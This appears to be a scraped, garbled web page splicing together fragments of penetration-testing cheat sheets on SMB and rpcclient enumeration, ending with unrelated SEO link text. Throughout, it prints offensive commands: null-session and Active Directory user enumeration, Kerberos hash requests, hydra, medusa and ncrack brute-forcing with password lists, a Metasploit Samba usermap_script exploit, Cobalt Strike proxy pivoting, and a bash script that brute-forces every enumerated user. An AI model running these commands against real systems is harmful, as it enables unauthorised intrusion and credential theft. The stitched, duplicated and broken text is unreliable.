A tag already exists with the provided branch name. Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: Moving on, same way, they can query info about specific AD users: Enumerate current user's privileges and many more (consult rpcclient for all available commands): Finally, of course they can run nmap if needed: Impacket provides even more tools to enumerate remote systems through compromised boxes. lsalookupprivvalue Get a privilege value given its name As from the previous commands, we saw that it is possible to create a user through rpcclient. A Mind Map about OSCP Guide submitted by Rikunj Sindhwad on Jun 12, 2021. During that time, the designers of the rpcclient might be clueless about the importance of this tool as a penetration testing tool. May need to run a second time for success. If the permissions allow, an attacker can delete a group as well. May need to run a second time for success. -i, --scope=SCOPE Use this Netbios scope, Authentication options: Active Directory & Kerberos Abuse. Are there any resources out there that go in-depth about SMB enumeration? help Get help on commands maybe brute-force ; 22/SSH. These privileges can help the attacker plan for elevating privileges on the domain. | Current user access: READ/WRITE SMB allows you to share your resources to other computers over the network, version susceptible to known attacks (Eternal blue , wanna cry), Disabled by default in newer Windows version, reduced "chattiness" of SMB1. | RRAS Memory Corruption vulnerability (MS06-025) On most Linuxes, we have tab auto-complete of commands, which extends into rpcclient commands. 548 - Pentesting Apple Filing Protocol (AFP) 554,8554 - Pentesting RTSP. samdeltas Query Sam Deltas | Type: STYPE_IPC_HIDDEN Obviously the SIDS are different but you can still pull down the usernames and start bruteforcing those other open services . result was NT_STATUS_NONE_MAPPED. As with the lsaenumsid, it was possible to extract the SID but it was not possible to tell which user has that SID. But sometimes these don't yield any interesting results. This tool is part of the samba(7) suite. PORT STATE SERVICE | \\[ip]\IPC$: | Type: STYPE_DISKTREE This means that SMB is running with NetBIOS over TCP/IP**. With --pw-nt-hash, the pwd provided is the NT hash, #Use --no-pass -c 'recurse;ls' to list recursively with smbclient, #List with smbmap, without folder it list everything. *' # download everything recursively in the wwwroot share to /usr/share/smbmap. -S, --signing=on|off|required Set the client signing state | grep -oP 'UnixSamba. can be cracked with, For passwordless login, add id_rsa.pub to target's authorized_keys, Add the extracted domain to /etc/hosts and dig again, rpcclient --user="" --command=enumprivs -N 10.10.10.10, rpcdump.py 10.11.1.121 -p 135 | grep ncacn_np // get pipe names, smbclient -L //10.10.10.10 -N // No password (SMB Null session), crackmapexec smb 10.10.10.10 -u '' -p '' --shares, crackmapexec smb 10.10.10.10 -u 'sa' -p '' --shares, crackmapexec smb 10.10.10.10 -u 'sa' -p 'sa' --shares, crackmapexec smb 10.10.10.10 -u '' -p '' --share share_name, crackmapexec smb 192.168.0.115 -u '' -p '' --shares --pass-pol, ncrack -u username -P rockyou.txt -T 5 10.10.10.10 -p smb -v, mount -t cifs "//10.1.1.1/share/" /mnt/wins, mount -t cifs "//10.1.1.1/share/" /mnt/wins -o vers=1.0,user=root,uid=0,gid=0. Nmap scan report for [ip] We will shine the light on the process or methodology for enumerating SMB services on the Target System/Server in this article. This lab shows how it is possible to bypass commandline argument logging when enumerating Windows environments, using Cobalt Strike and its socks proxy (or any other post exploitation tool that supports socks proxying). NETLOGON | State: VULNERABLE The following lists commands that you can issue to SAMR, LSARPC, and LSARPC-DS interfaces upon, # You can also use samrdump.py for this purpose, Enumerate trusted domains within an AD forest. | Risk factor: HIGH . result was NT_STATUS_NONE_MAPPED SPOOLSS lsaaddacctrights Add rights to an account Works well for listing and downloading files, and listing shares and permissions. Enumerate Domain Users. path: C:\tmp rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1014 When dealing with SMB an attacker is bound to be dealt with the Network Shares on the Domain. | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143 #These are the commands I run in order every time I see an open SMB port, smbclient -N //{IP}/ --option="client min protocol"=LANMAN1, crackmapexec smb {IP} --pass-pol -u "" -p "", crackmapexec smb {IP} --pass-pol -u "guest" -p "", GetADUsers.py -dc-ip {IP} "{Domain_Name}/" -all, GetNPUsers.py -dc-ip {IP} -request "{Domain_Name}/" -format hashcat, GetUserSPNs.py -dc-ip {IP} -request "{Domain_Name}/", smbmap -H {IP} -u {Username} -p {Password}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP}, smbclient "\\\\{IP}\\\" -U {Username} -W {Domain_Name} -l {IP} --pw-nt-hash `hash`, crackmapexec smb {IP} -u {Username} -p {Password} --shares, GetADUsers.py {Domain_Name}/{Username}:{Password} -all, GetNPUsers.py {Domain_Name}/{Username}:{Password} -request -format hashcat, GetUserSPNs.py {Domain_Name}/{Username}:{Password} -request, https://book.hacktricks.xyz/pentesting/pentesting-smb, Command: nmap -p 139,445 -vv -Pn --script=smb-vuln-cve2009-3103.nse,smb-vuln-ms06-025.nse,smb-vuln-ms07-029.nse,smb-vuln-ms08-067.nse,smb-vuln-ms10-054.nse,smb-vuln-ms10-061.nse,smb-vuln-ms17-010.nse {IP}, Description: SMB Vuln Scan With Nmap (Less Specific), Command: nmap --script smb-vuln* -Pn -p 139,445 {IP}, Command: hydra -t 1 -V -f -l {Username} -P {Big_Passwordlist} {IP} smb, Name: SMB/SMB2 139/445 consolesless mfs enumeration, Description: SMB/SMB2 139/445 enumeration without the need to run msfconsole, Note: sourced from https://github.com/carlospolop/legion, Command: msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 139; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb_version; set RHOSTS {IP}; set RPORT 445; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smb/smb2; set RHOSTS {IP}; set RPORT 445; run; exit'. The SID was retrieved using the lookupnames command. In there you may, many different batch, VBScript, and PowerShell, using some discovered credentials. . lsaenumsid Enumerate the LSA SIDS -z $2 ]; then rport=$2; else rport=139; fi, tcpdump -s0 -n -i tap0 src $rhost and port $rport -A -c 7 2>/dev/null | grep -i "samba\|s.a.m" | tr -d '.' It contains contents from other blogs for my quick reference, * nmap -sV --script=vulscan/vulscan.nse (https://securitytrails.com/blog/nmap-vulnerability-scan), masscan -p1-65535,U:1-65535 --rate=1000 10.10.10.x -e tun0 > ports, ports=$(cat ports | awk -F " " '{print $4}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/,$//'), nmap -Pn -sC -sV --script=vuln*.nse -p$ports 10.10.10.x -T5 -A, (performs full scan instead of syn-scan to prevent getting flagged by firewalls), From Apache Version to finding Ubuntu version -> ubuntu httpd versions, : Private key that is used for login. In the demonstration, it can be observed that the SID that was enumerated belonged to the Administrator of the Builtin users. [hostname] <00> - M LSARPC path: C:\tmp It also includes the commands that I used on platforms such as Vulnhub and Hack the Box. remark: IPC Service (Mac OS X) This is an approach I came up with while researching on offensive security. Let's see how this works by firstly updating the proxychains config file: Once proxychains are configured, the attacker can start enumerating the AD environment through the beacon like so: proxychains rpcclient 10.0.0.6 -U spotless, Victim (10.0.0.2) is enumerating DC (10.0.0.6) on behalf of attacker (10.0.0.5). Manh-Dung Nguyen Blog Pentest Publications Whoami @ Code & Process Injection. {% code-tabs-item title="attacker@kali" %}. logonctrl2 Logon Control 2 echoaddone Add one to a number deleteform Delete form It accepts the group name as a parameter. The article is focused on Red Teamers but Blue Teamers and Purple Teamers can also use these commands to test the security configurations they deployed. ECHO The next command to demonstrate is lookupsids. <03> - M *[0-9a-z]' | tr -d '\n' & echo -n "$rhost: " &, echo "exit" | smbclient -L $rhost 1>/dev/null 2>/dev/null, # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, medusa -h $ip -u userhere -P /usr/share/seclists/Passwords/Common-Credentials/10k-most-common.txt -M smbnt, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv, msfconsole; use auxiliary/scanner/smb/smb_version; set RHOSTS $ip; run, msfconsole; use exploit/multi/samba/usermap_script; set lhost 10.10.14.x; set rhost $ip; run, Windows 7, 8, 8.1 and Windows Server 2003/2008/2012(R2)/2016, nmap -p 445 $ip --script=smb-vuln-ms17-010, hydra -l administrator -P /usr/share/wordlists/rockyou.txt -t 1 $ip smb, smbclient \\\\192.168.1.105\\ipc$ -U john. Once we have a SID we can enumerate the rest. Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port. Most secure. queryuser Query user info exit Exit program lsaenumprivsaccount Enumerate the privileges of an SID A NetBIOS name is up to 16 characters long and usually, separate from the computer name. To demonstrate this, the attacker first used the lsaaddpriv command to add the SeCreateTokenPrivielge to the SID and then used the lsadelpriv command to remove that privilege from that group as well. deldriverex Delete a printer driver with files Cannot retrieve contributors at this time. This problem is solved using lookupnames whereupon providing username the SID of that particular user can be extracted with ease. With an anonymous null session you can access the IPC$ share and interact with services exposed via named pipes. querygroupmem Query group membership It is also possible to manipulate the privileges of that SID to make them either vulnerable to a particular privilege or remove the privilege of a user altogether. SYSVOL NO ACCESS, [+] Finding open SMB ports. If you get credentials, you can re-run to show new access: nmap --script smb-enum-shares -p 139,445 [ip]. rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-1000 rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2002 NETLOGON READ ONLY 445/tcp open microsoft-ds After creating the group, it is possible to see the newly created group using the enumdomgroup command. samquerysecobj Query SAMR security object rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-2001 setform Set form --------------- ---------------------- change_trust_pw Change Trust Account Password At last, it can be verified using the enumdomusers command. Some of these commands are based on those executed by the Autorecon tool. --------------- ---------------------- dfsgetinfo Query DFS share info to access through Web; FTP to file upload ==> Execute from web == webshell ; Password Checking if you found with other enum. Shortcut to New Folder (2).lnk A 420 Sun Dec 13 05:24:51 2015 Reverse Shell. Beyond the enumeration I show here, it will also help enumerate shares that are readable, and can ever execute commands on writable shares. srvinfo Server query info |_ https://technet.microsoft.com/en-us/library/security/ms06-025.aspx logonctrl Logon Control What script needs to be executed on the user's login? An attacker can create an account object based on the SID of that user. A Little Guide to SMB Enumeration. To do this first, the attacker needs a SID. It can be used on the rpcclient shell that was generated to enumerate information about the server. In the demonstration, it can be observed that the user has stored their credentials in the Description. You can also fire up wireshark and list target shares with smbclient , you can use anonymous listing to explained above and after that find , # smbenum 0.2 - This script will enumerate SMB using every tool in the arsenal, echo -e "\n########## Getting Netbios name ##########", echo -e "\n########## Checking for NULL sessions ##########", output=`bash -c "echo 'srvinfo' | rpcclient $IP -U%"`, echo -e "\n########## Enumerating domains ##########", bash -c "echo 'enumdomains' | rpcclient $IP -U%", echo -e "\n########## Enumerating password and lockout policies ##########", echo -e "\n########## Enumerating users ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-users $IP, bash -c "echo 'enumdomusers' | rpcclient $IP -U%", bash -c "echo 'enumdomusers' | rpcclient $IP -U%" | cut -d[ -f2 | cut -d] -f1 > /tmp/$IP-users.txt, echo -e "\n########## Enumerating Administrators ##########", net rpc group members "Administrators" -I $IP -U%, echo -e "\n########## Enumerating Domain Admins ##########", net rpc group members "Domain Admins" -I $IP -U%, echo -e "\n########## Enumerating groups ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-groups $IP, echo -e "\n########## Enumerating shares ##########", nmap -Pn -T4 -sS -p139,445 --script=smb-enum-shares $IP, echo -e "\n########## Bruteforcing all users with 'password', blank and username as password", hydra -e ns -L /tmp/$IP-users.txt -p password $IP smb -t 1, hydra -t 1 -V -f -l administrator -P /usr/share/wordlists/rockyou.txt $ip smb, nmap -p445 --script smb-brute --script-args userdb=userfilehere,passdb=/usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt $ip -vvvv. shutdownabort Abort Shutdown (over shutdown pipe) Host script results: rpcclient $> lookupsids S-1-5-21-1835020781-2383529660-3657267081-500 Learn more about the OS Versions. 1098/1099/1050 - Pentesting Java RMI - RMI-IIOP. lsaquerysecobj Query LSA security object # download everything recursively in the wwwroot share to /usr/share/smbmap. rpcclient $> lookupnames lewis Nice! Enter WORKGROUP\root's password: setprinterdata Set REG_SZ printer data Hence, they usually set up a Network Share. After the user details and the group details, another information that can help an attacker that has retained the initial foothold on the domain is the Privileges.

Lawrence Sullivan Disappearance, David Mulugheta Salary, Articles R